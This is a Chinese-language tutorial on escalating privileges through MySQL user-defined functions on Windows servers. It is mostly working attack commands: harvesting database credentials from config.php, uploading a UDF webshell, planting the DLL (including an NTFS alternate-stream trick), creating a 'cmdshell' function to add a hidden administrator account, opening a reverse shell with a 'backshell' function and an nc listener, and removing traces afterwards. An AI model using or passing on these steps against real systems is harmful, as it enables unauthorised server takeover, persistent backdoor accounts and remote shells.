mysql提权
UDF提权
1、利用UDF提权
udf提权这是最常见的提权方式,也就是User defined Function,用户定义函数。是一类对MYSQL服务器功能进行扩充的代码,通常是用C(或C++)写的。通过添加新函数,性质就象使用本地MYSQL函数abs()或concat()。当你需要扩展MYSQL服务器功能时,UDF通常是最好的选择。但同时,UDF也是黑客们在拥有低权限mysql账号时比较好用的一种提权方法。
适用场合:
1、目标主机系统是Windows(Win2000、XP、Win2003)。
2、拥有该主机mysql中的某个用户账号,该账号需要有对mysql的insert和delete权限。
使用方法:
1、获取当前mysql的一个账号,一般情况下在网站的config.php文件就能找到(具体在哪个文件每个CMS都不一样)。
2、把udf专用的webshell传到服务器上,访问并进行数据库连接。
3、连接成功后,导出DLL文件。mysql<5.0,导出路径随意;5.0<=mysql<5.1,则需要导出至目标服务器的系统目录(如:system32),否则在下一步操作中你会看到“No paths allowed for shared library”错误;mysql>5.1,需要使用
show variables like '%plugin%';
语句查看插件安装路径,导出的时候指定DLL路径为插件路径。
回显如下:
mysql
>
show variables like '%plugin%';
+---------------+------------------------------------------+
| Variable_name | Value |
+---------------+------------------------------------------+
| plugin_dir | E:\wamp\bin\mysql\mysql5.5.20\lib/plugin |
+---------------+------------------------------------------+
4、使用SQL语句创建自定义函数。语法如下:
Create Function 函数名 returns string soname '导出的DLL路径';
// eg:Create Function cmdshell returns string soname 'udf.dll';
常用函数名:
cmdshell 执行cmd;
downloader 下载者,到网上下载指定文件并保存到指定目录;
open3389 通用开3389终端服务,可指定端口(不改端口无需重启);
backshell 反弹Shell;
ProcessView 枚举系统进程;
KillProcess 终止指定进程;
regread 读注册表;
regwrite 写注册表;
shut 关机,注销,重启;
about 说明与帮助函数;
若mysql>=5.0,语句中的DLL不允许带全路径,如果在第二步中已将DLL导出到系统目录,那么你就可以省略路径而使命令正常执行,否则将会看到”Can't open shared library“错误。
如果提示“Function 'cmdshell' already exists”,则输入下列语句可以解决:
delete from mysql.func where name='cmdshell'
5、创建函数成功后,就可以通过sql语句去调用它了。语法如下:
select 创建的函数名 ('参数列表');
// eg:select cmdshell("net user hacker 12345 /add"); 创建一个用户hacker,密码为12345
6、函数使用完后,我们需要把之前生成的DLL和创建的函数删除掉,但要注意次序,必须先删除函数再删除DLL。删除函数的语法如下:
drop function 创建的函数名;
// eg:drop function cmdshell;
具体流程如下:
create function cmdshell returns string soname 'udf.dll';
select cmdshell('net user waitalone waitalone.cn /add');
select cmdshell('net localgroup administrators waitalone /add');
drop function cmdshell; 删除函数
delete from mysql.func where name='cmdshell' 删除函数
注意:
1、导出的文件名不一定非是xxx.dll,可以是任意的。
create function sys_eval returns string soname 'udf.xox';
2、提示错误 Can't open shared library 'fun.dll' (errno: 2 )
除了udf不存在、udf被杀,还有可能是你的udf版本不对,你拿32位的udf去在64位系统注册的话,一样会提示错误。
3、某些情况下,我们会遇到Can't open shared library的情况,这时就需要我们把udf.dll导出到lib\plugin目录下才可以,但是默认情况下plugin不存在,可以利用NTFS ADS流来创建文件夹的方法
select @@basedir; //查找到mysql的目录
select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION'; //利用NTFS ADS创建lib目录
select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION'; //利用NTFS ADS创建plugin目录
4、降权的mysql一样有用,能注册dll的话你一样能够执行命令,不过权限是根据mysql来的, 在不支持aspx,ws、shell.application被删得情况下还有一丝希望。
反弹端口连接提权
假如我们扫到了一个mysql的root弱密码,并且可以外连,但是服务器上面的网站又无法Getshell,这时我们怎么办呢?
1、利用mysql客户端工具连接mysql服务器,然后执行下面的操作。
mysql.exe -h 172.16.10.11 -uroot -p
Enter password:
mysql
>
\. c:\mysql.txt
mysql
>
select backshell("YourIP",2010);
2、本地监听你反弹的端口
nc.exe -vv -l -p 2010
成功后,将获得一个system权限的cmdshell,其实这个也是利用的UDF提权。